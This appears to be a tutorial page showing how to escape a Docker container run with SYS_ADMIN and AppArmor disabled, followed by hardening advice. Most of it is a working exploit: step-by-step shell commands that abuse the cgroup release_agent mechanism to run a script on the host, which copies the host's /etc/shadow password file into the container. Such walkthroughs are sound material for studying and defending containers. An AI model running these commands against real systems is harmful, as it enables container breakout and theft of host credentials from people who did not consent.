Escaping from a Docker container
SYS_ADMIN capability and AppArmor disabled
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash
Then in the container, we are going to run these commands.
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n ‘s/.*\perdir=\([^,]*\).*/\1/p’ /etc/mtab`
echo “$host_path/cmd” > /tmp/cgrp/release_agent
echo ‘#!/bin/sh’ > /cmd
echo “cat /etc/shadow > $host_path/shadow” >> /cmd
chmod a+x /cmd
sh -c “echo \$\$ > /tmp/cgrp/x/cgroup.procs”
Once you execute the above commands, you can see the host OS’s passwords in /shadow folder
cat /shadow
As we can see we were able to break out of the container. Suffice to say, we abused misconfigurations to escape a container. This wouldn’t have happened if the non-root user was used, SYS_ADMIN and AppArmor profile wasn’t disabled. In short,
Do not use –privileged flag, it disables all the security mechanisms placed by docker.
Do not mount root volumes into the containers.
Do not mount docker.sock inside the containers.
Default docker settings are sane, please do not disable them or add more capabilities.
Use SecComp and AppArmor profiles to harden the container.
Do not run containers as the root user.
最后更新于
这有帮助吗?